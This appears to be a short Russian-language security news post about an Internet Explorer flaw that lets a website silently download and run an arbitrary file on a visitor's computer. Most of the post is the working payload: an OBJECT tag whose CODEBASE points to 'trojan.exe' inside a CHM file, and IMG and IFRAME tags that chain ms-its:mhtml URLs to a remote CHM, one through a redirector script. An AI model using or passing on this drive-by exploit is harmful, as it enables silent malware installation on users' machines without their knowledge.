В IE обнаружена очередная критическая
ошибка. При помощи специального CLSID можно
загрузить на компьютер жертвы и выполнить
произвольный файл в случае, когда он просто
зайдет на сайт. Произойдет это естественно
без всякого вмешательства пользователя.

Реализовать это можно обозвав скрипт с
CLASSID файлом CHM.

Файл LAUNCH.HTML содержит:

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123'
CODEBASE='trojan.exe'>

Для исполнения используем следующую
конструкцию:

<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии